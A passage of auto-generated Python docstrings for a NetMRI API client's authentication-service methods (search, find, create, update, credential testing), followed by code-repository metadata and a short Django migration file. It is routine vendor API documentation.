disabled. :type enabled_ind: Array of Boolean | ``api version min:`` 3 | ``api version max:`` None | ``required:`` False | ``default:`` None :param id: The id of the authentication service. :type id: Array of Integer | ``api version min:`` 3 | ``api version max:`` None | ``required:`` False | ``default:`` None :param priority: The priority assigned to this Authentication Service. :type priority: Array of Integer | ``api version min:`` 3 | ``api version max:`` None | ``required:`` False | ``default:`` None :param service_name: The name of the Authentication Service. :type service_name: Array of String | ``api version min:`` 3 | ``api version max:`` None | ``required:`` False | ``default:`` None :param timeout: The timeout interval of the service authentication servers. :type timeout: Array of Integer | ``api version min:`` 3 | ``api version max:`` None | ``required:`` False | ``default:`` None :param updated_at: The date and time the record was last modified in NetMRI. :type updated_at: Array of DateTime | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` 0 :param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information. :type start: Integer | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` 1000 :param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000. :type limit: Integer | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` id :param sort: The data field(s) to use for sorting the output. Default is id. Valid values are id, service_name, auth_method, description, priority, context_params_json, enabled_ind, enabled_authz_ind, timeout, created_at, updated_at. :type sort: Array of String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` asc :param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'. :type dir: Array of String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param select: The list of attributes to return for each AuthService. Valid values are id, service_name, auth_method, description, priority, context_params_json, enabled_ind, enabled_authz_ind, timeout, created_at, updated_at. If empty or omitted, all attributes will be returned. :type select: Array | ``api version min:`` 2.8 | ``api version max:`` None | ``required:`` False | ``default:`` None :param goto_field: The field name for NIOS GOTO that is used for locating a row position of records. :type goto_field: String | ``api version min:`` 2.8 | ``api version max:`` None | ``required:`` False | ``default:`` None :param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records. :type goto_value: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param query: This value will be matched against auth services, looking to see if one or more of the listed attributes contain the passed value. You may also surround the value with '/' and '/' to perform a regular expression search rather than a containment operation. Any record that matches will be returned. The attributes searched are: auth_method, context_params_json, created_at, description, enabled_authz_ind, enabled_ind, id, priority, service_name, timeout, updated_at. :type query: String | ``api version min:`` 2.3 | ``api version max:`` None | ``required:`` False | ``default:`` None :param xml_filter: A SetFilter XML structure to further refine the search. The SetFilter will be applied AFTER any search query or field values, but before any limit options. The limit and pagination will be enforced after the filter. Remind that this kind of filter may be costly and inefficient if not associated with a database filtering. :type xml_filter: String **Outputs** | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :return auth_services: An array of the AuthService objects that match the specified input criteria. :rtype auth_services: Array of AuthService """ return self.api_list_request(self._get_method_fullname("search"), kwargs) def find(self, **kwargs): """Lists the available auth services matching the input specification. This provides the most flexible search specification of all the query mechanisms, enabling searching using comparison operations other than equality. However, it is more complex to use and will not perform as efficiently as the index or search methods. In the input descriptions below, 'field names' refers to the following fields: auth_method, context_params_json, created_at, description, enabled_authz_ind, enabled_ind, id, priority, service_name, timeout, updated_at. **Inputs** | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param op_auth_method: The operator to apply to the field auth_method. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. auth_method: The Authentication method of the service. One of (local, radius, tacacs, ldap, activedirectory). For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values. :type op_auth_method: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param val_f_auth_method: If op_auth_method is specified, the field named in this input will be compared to the value in auth_method using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_auth_method must be specified if op_auth_method is specified. :type val_f_auth_method: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param val_c_auth_method: If op_auth_method is specified, this value will be compared to the value in auth_method using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_auth_method must be specified if op_auth_method is specified. :type val_c_auth_method: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param op_context_params_json: The operator to apply to the field context_params_json. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. context_params_json: Additional specific authentication method parameters are stored in this field using a json format. (such as 'base_dn' for LDAP method, Vendor Specific Attribute ID for Radius,...). For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values. :type op_context_params_json: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param val_f_context_params_json: If op_context_params_json is specified, the field named in this input will be compared to the value in context_params_json using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_context_params_json must be specified if op_context_params_json is specified. :type val_f_context_params_json: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param val_c_context_params_json: If op_context_params_json is specified, this value will be compared to the value in context_params_json using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_context_params_json must be specified if op_context_params_json is specified. :type val_c_context_params_json: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param op_created_at: The operator to apply to the field created_at. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. created_at: The date and time the record was initially created in NetMRI. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values. :type op_created_at: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param val_f_created_at: If op_created_at is specified, the field named in this input will be compared to the value in created_at using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_created_at must be specified if op_created_at is specified. :type val_f_created_at: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param val_c_created_at: If op_created_at is specified, this value will be compared to the value in created_at using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_created_at must be specified if op_created_at is specified. :type val_c_created_at: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param op_description: The operator to apply to the field description. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. description: Description/comment about this authentication service For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values. :type op_description: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param val_f_description: If op_description is specified, the field named in this input will be compared to the value in description using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_description must be specified if op_description is specified. :type val_f_description: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param val_c_description: If op_description is specified, this value will be compared to the value in description using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_description must be specified if op_description is specified. :type val_c_description: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param op_enabled_authz_ind: The operator to apply to the field enabled_authz_ind. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. enabled_authz_ind: A flag indicating whether this service is used for computing privileges for the remote users. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values. :type op_enabled_authz_ind: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param val_f_enabled_authz_ind: If op_enabled_authz_ind is specified, the field named in this input will be compared to the value in enabled_authz_ind using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_enabled_authz_ind must be specified if op_enabled_authz_ind is specified. :type val_f_enabled_authz_ind: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param val_c_enabled_authz_ind: If op_enabled_authz_ind is specified, this value will be compared to the value in enabled_authz_ind using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_enabled_authz_ind must be specified if op_enabled_authz_ind is specified. :type val_c_enabled_authz_ind: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param op_enabled_ind: The operator to apply to the field enabled_ind. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. enabled_ind: A flag indicating whether the authentication service settings is enabled or disabled. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values. :type op_enabled_ind: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param val_f_enabled_ind: If op_enabled_ind is specified, the field named in this input will be compared to the value in enabled_ind using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_enabled_ind must be specified if op_enabled_ind is specified. :type val_f_enabled_ind: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param val_c_enabled_ind: If op_enabled_ind is specified, this value will be compared to the value in enabled_ind using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_enabled_ind must be specified if op_enabled_ind is specified. :type val_c_enabled_ind: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param op_id: The operator to apply to the field id. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. id: The id of the authentication service. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values. :type op_id: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param val_f_id: If op_id is specified, the field named in this input will be compared to the value in id using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_id must be specified if op_id is specified. :type val_f_id: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param val_c_id: If op_id is specified, this value will be compared to the value in id using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_id must be specified if op_id is specified. :type val_c_id: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param op_priority: The operator to apply to the field priority. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. priority: The priority assigned to this Authentication Service. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values. :type op_priority: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param val_f_priority: If op_priority is specified, the field named in this input will be compared to the value in priority using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_priority must be specified if op_priority is specified. :type val_f_priority: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param val_c_priority: If op_priority is specified, this value will be compared to the value in priority using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_priority must be specified if op_priority is specified. :type val_c_priority: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param op_service_name: The operator to apply to the field service_name. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. service_name: The name of the Authentication Service. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values. :type op_service_name: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param val_f_service_name: If op_service_name is specified, the field named in this input will be compared to the value in service_name using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_service_name must be specified if op_service_name is specified. :type val_f_service_name: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param val_c_service_name: If op_service_name is specified, this value will be compared to the value in service_name using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_service_name must be specified if op_service_name is specified. :type val_c_service_name: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param op_timeout: The operator to apply to the field timeout. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. timeout: The timeout interval of the service authentication servers. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values. :type op_timeout: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param val_f_timeout: If op_timeout is specified, the field named in this input will be compared to the value in timeout using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_timeout must be specified if op_timeout is specified. :type val_f_timeout: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param val_c_timeout: If op_timeout is specified, this value will be compared to the value in timeout using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_timeout must be specified if op_timeout is specified. :type val_c_timeout: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param op_updated_at: The operator to apply to the field updated_at. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. updated_at: The date and time the record was last modified in NetMRI. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values. :type op_updated_at: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param val_f_updated_at: If op_updated_at is specified, the field named in this input will be compared to the value in updated_at using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_updated_at must be specified if op_updated_at is specified. :type val_f_updated_at: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param val_c_updated_at: If op_updated_at is specified, this value will be compared to the value in updated_at using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_updated_at must be specified if op_updated_at is specified. :type val_c_updated_at: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` 0 :param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information. :type start: Integer | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` 1000 :param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000. :type limit: Integer | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` id :param sort: The data field(s) to use for sorting the output. Default is id. Valid values are id, service_name, auth_method, description, priority, context_params_json, enabled_ind, enabled_authz_ind, timeout, created_at, updated_at. :type sort: Array of String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` asc :param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'. :type dir: Array of String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param select: The list of attributes to return for each AuthService. Valid values are id, service_name, auth_method, description, priority, context_params_json, enabled_ind, enabled_authz_ind, timeout, created_at, updated_at. If empty or omitted, all attributes will be returned. :type select: Array | ``api version min:`` 2.8 | ``api version max:`` None | ``required:`` False | ``default:`` None :param goto_field: The field name for NIOS GOTO that is used for locating a row position of records. :type goto_field: String | ``api version min:`` 2.8 | ``api version max:`` None | ``required:`` False | ``default:`` None :param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records. :type goto_value: String | ``api version min:`` 2.3 | ``api version max:`` None | ``required:`` False | ``default:`` None :param xml_filter: A SetFilter XML structure to further refine the search. The SetFilter will be applied AFTER any search query or field values, but before any limit options. The limit and pagination will be enforced after the filter. Remind that this kind of filter may be costly and inefficient if not associated with a database filtering. :type xml_filter: String **Outputs** | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :return auth_services: An array of the AuthService objects that match the specified input criteria. :rtype auth_services: Array of AuthService """ return self.api_list_request(self._get_method_fullname("find"), kwargs) def destroy(self, **kwargs): """Deletes the specified auth service from NetMRI. **Inputs** | ``api version min:`` None | ``api version max:`` None | ``required:`` True | ``default:`` None :param id: The id of the authentication service. :type id: Integer **Outputs** """ return self.api_request(self._get_method_fullname("destroy"), kwargs) def create(self, **kwargs): """Create a new Authentication Service **Inputs** | ``api version min:`` None | ``api version max:`` None | ``required:`` True | ``default:`` None :param service_name: The name of the authentication service, must be unique :type service_name: String | ``api version min:`` None | ``api version max:`` None | ``required:`` True | ``default:`` None :param auth_method: The authentication method of the service. One of (local, radius, tacacs, ldap, activedirectory). :type auth_method: String | ``api version min:`` None | ``api version max:`` None | ``required:`` True | ``default:`` None :param priority: The priority assigned to this authentication service :type priority: Integer | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param description: Description/comment about this authentication service :type description: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` True :param enabled_ind: A flag indicating whether the authentication service settings is enabled or disabled :type enabled_ind: Boolean | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` False :param enabled_authz_ind: A flag indicating whether this service is used for computing privileges for the remote users :type enabled_authz_ind: Boolean | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` 5 :param timeout: The timeout interval of the service authentication servers :type timeout: Integer | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param auth_domain: Authentication Active Directory Domain name or LDAP BaseDN to use for search. (required for LDAP & Active Directory methods) :type auth_domain: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` cn :param user_attr: User attribute ID for LDAP authentication method (required for LDAP methods). :type user_attr: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` memberOf :param group_attr: Group membership attribute ID for LDAP authentication method. The LDAP server has to be configured to use memberOf Overlay. :type group_attr: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` False :param auth_type: A flag indicating whether the search request to the LDAP server is performed anonymously or needs authentication using a privileged bind User and Password. (values: 'true' for Authenticated, 'false' for anonymous') :type auth_type: Boolean | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param bind_user: The bind User complete 'dn' in case LDAP Authenticated connection is needed to request search to find user :type bind_user: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param bind_passwd: The bind User password in case LDAP Authenticated connection is needed to request search to find user :type bind_passwd: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` subtree :param search_scope: Specify the scope of the LDAP search.<br> - 'base': Search only the base object.<br> - 'one': Search the entries immediately below the base object.<br> - 'subtree': Search the whole tree below (and including) the base object. This is the default. :type search_scope: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` infoblox :param tacacs_service: The name of the defined custom service for Infoblox.<br> group = GR_1{<br> service = infoblox { na-group-info = MY_GROUP_1 }<br> } :type tacacs_service: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` na-group-info :param tacacs_group_attr: The name of the group attribute defined in the Tacacs+ server to retrieve the user's groups list.<br> group = GR_1{<br> service = infoblox { na-group-info = MY_GROUP_1 }<br> } :type tacacs_group_attr: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` 7779 :param radius_vendor_id: The Infoblox Vendor ID defined in the radius dictionary.<br> VENDOR infoblox 7779 :type radius_vendor_id: Integer | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` 10 :param radius_vsa_id: The Vendor Specific Attribute ID as defined in the radius server dictionary to retrieve the user's groups list.<br> ATTRIBUTE na-group-info 10 string infoblox :type radius_vsa_id: Integer **Outputs** | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :return service_id: The new authentication service id. :rtype service_id: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :return service_name: The new authentication service name. :rtype service_name: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :return service_description: The new authentication service description. :rtype service_description: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :return saml_entity_id: SAML Entity ID :rtype saml_entity_id: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :return saml_metadata: SAML Metadata URL :rtype saml_metadata: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :return saml_cacert: SAML Certificate :rtype saml_cacert: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :return saml_cacert_fn: SAML Certificate file name :rtype saml_cacert_fn: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :return saml_cacert_key: SAML Key :rtype saml_cacert_key: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :return saml_cacert_key_fn: SAML Key file name :rtype saml_cacert_key_fn: String """ return self.api_request(self._get_method_fullname("create"), kwargs) def update(self, **kwargs): """Update an existing Authentication Service **Inputs** | ``api version min:`` None | ``api version max:`` None | ``required:`` True | ``default:`` None :param id: The id of the authentication service to modify :type id: Integer | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param service_name: The name of the authentication service, must be unique :type service_name: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param auth_method: The authentication method of the service. One of (local, radius, tacacs, ldap, activedirectory). :type auth_method: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param priority: The priority assigned to this authentication service :type priority: Integer | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param description: Description/comment of this authentication service :type description: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param enabled_ind: A flag indicating whether the authentication service settings is enabled or disabled :type enabled_ind: Boolean | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param enabled_authz_ind: A flag indicating whether this service is used for computing privileges for the remote users :type enabled_authz_ind: Boolean | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param timeout: The timeout interval of the service authentication servers :type timeout: Integer | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param auth_domain: Authentication Active Directory Domain name or LDAP BaseDN to use for search. (required for LDAP & Active Directory methods) :type auth_domain: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param user_attr: User attribute ID for LDAP authentication method (required for LDAP methods). :type user_attr: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param group_attr: Group membership attribute ID for LDAP authentication method. The LDAP server has to be configured to use memberOf Overlay. :type group_attr: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param auth_type: A flag indicating whether the search request to the LDAP server is performed anonymously or needs authentication using a privileged bind User and Password. (values: 'true' for Authenticated, 'false' for anonymous') :type auth_type: Boolean | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param bind_user: The bind User complete 'dn' in case LDAP Authenticated connection is needed to request search to find user :type bind_user: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param bind_passwd: The bind User password in case LDAP Authenticated connection is needed to request search to find user :type bind_passwd: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param search_scope: Specify the scope of the LDAP search.<br> - 'base': Search only the base object.<br> - 'one': Search the entries immediately below the base object.<br> - 'subtree': Search the whole tree below (and including) the base object. This is the default. :type search_scope: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param tacacs_service: The name of the defined custom service for Infoblox.<br> group = GR_1{<br> service = infoblox { na-group-info = MY_GROUP_1 }<br> } :type tacacs_service: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param tacacs_group_attr: The name of the group attribute defined in the Tacacs+ server to retrieve the user's groups list.<br> group = GR_1{<br> service = infoblox { na-group-info = MY_GROUP_1 }<br> } :type tacacs_group_attr: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param radius_vendor_id: The Infoblox Vendor ID defined in the radius dictionary.<br> VENDOR infoblox 7779 :type radius_vendor_id: Integer | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param radius_vsa_id: The Vendor Specific Attribute ID as defined in the radius server dictionary to retrieve the user's groups list.<br> ATTRIBUTE na-group-info 10 string infoblox :type radius_vsa_id: Integer **Outputs** | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :return service_id: The new authentication service id. :rtype service_id: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :return service_name: The new authentication service name. :rtype service_name: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :return service_description: The new authentication service description. :rtype service_description: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :return saml_entity_id: SAML Entity ID :rtype saml_entity_id: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :return saml_metadata: SAML Metadata URL :rtype saml_metadata: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :return saml_cacert: SAML Certificate :rtype saml_cacert: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :return saml_cacert_fn: SAML Certificate file name :rtype saml_cacert_fn: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :return saml_cacert_key: SAML Key :rtype saml_cacert_key: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :return saml_cacert_key_fn: SAML Key file name :rtype saml_cacert_key_fn: String """ return self.api_request(self._get_method_fullname("update"), kwargs) def duplicate(self, **kwargs): """Duplicate an authentication service. **Inputs** | ``api version min:`` None | ``api version max:`` None | ``required:`` True | ``default:`` None :param id: The internal NetMRI identifier for the authentication service. :type id: Integer **Outputs** | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :return service_id: The new authentication service id. :rtype service_id: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :return service_name: The new authentication service name. :rtype service_name: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :return service_description: The new authentication service description. :rtype service_description: String """ return self.api_request(self._get_method_fullname("duplicate"), kwargs) def auth_servers(self, **kwargs): """List all servers defined for the requested Authentication Service **Inputs** | ``api version min:`` None | ``api version max:`` None | ``required:`` True | ``default:`` None :param id: The id of the authentication service to list the servers for :type id: Integer **Outputs** """ return self.api_request(self._get_method_fullname("auth_servers"), kwargs) def auth_test_creds(self, **kwargs): """Test credentials for this service Authentication Servers that are stored in db. **Inputs** | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param service_id: The id of the authentication service to test :type service_id: Integer | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param username: The login of the user to test :type username: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param password: The password of the user to test :type password: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param nohtml: Convert output to simple text :type nohtml: Boolean | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param id: The id of the session output file to display. :type id: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` 0 :param read: Offset in bytes from the start of the file. :type read: Integer **Outputs** | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :return id: The id of the session output file. :rtype id: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :return read: Offset in bytes from the start of the file, to be used in the next auth_test_creds call, in order to retrieve the next lines of the output. :rtype read: Integer | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :return output: Result of the credential test. :rtype output: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :return status: Status of the remaining output data to dump: <br><dd> 0: if the dump of the credential test output is completed. <br><dd> 1: if there is still output data to dump. :rtype status: Integer """ return self.api_request(self._get_method_fullname("auth_test_creds"), kwargs)
45.21696
551
0.576273
8a77c01b8f406eac0194dde8ff68f36a1f189a7b
617
py
Python
forum/migrations/0027_c.py
shmilyoo/ggxxBBS
cef6408e533bd0b0f57c3e2f5da4e93ea07c4331
[ "MIT" ]
null
null
null
forum/migrations/0027_c.py
shmilyoo/ggxxBBS
cef6408e533bd0b0f57c3e2f5da4e93ea07c4331
[ "MIT" ]
null
null
null
forum/migrations/0027_c.py
shmilyoo/ggxxBBS
cef6408e533bd0b0f57c3e2f5da4e93ea07c4331
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- from __future__ import unicode_literals from django.db import models, migrations class Migration(migrations.Migration): dependencies = [ ('forum', '0026_a_b'), ] operations = [ migrations.CreateModel( name='C', fields=[ ('id', models.AutoField(serialize=False, primary_key=True)), ('name', models.CharField(default=b'', max_length=16)), ('time', models.DateTimeField(auto_now=True)), ], options={ }, bases=(models.Model,), ), ]
23.730769
76
0.523501
c7b6ca60dd2bb29a50f7e726b0325d56cbd04d1d
2,322
py
Python
applications/FootballAction/train_lstm/scenario_lib/config.py
XYZ916829/PaddleVideo
8e422ee9fd4e08b711e80b7e9ff627c331f31c30
[ "Apache-2.0" ]
5
2022-01-30T07:35:58.000Z
2022-02-08T05:45:20.000Z
applications/FootballAction/train_lstm/scenario_lib/config.py
liutinglong/PaddleVideo
6b8a723360ac652ca7aafa1908e6c67a67cf5ea5
[ "Apache-2.0" ]
null
null
null
applications/FootballAction/train_lstm/scenario_lib/config.py
liutinglong/PaddleVideo
6b8a723360ac652ca7aafa1908e6c67a67cf5ea5
[ "Apache-2.0" ]
1
2022-01-24T16:27:01.000Z
2022-01-24T16:27:01.000Z
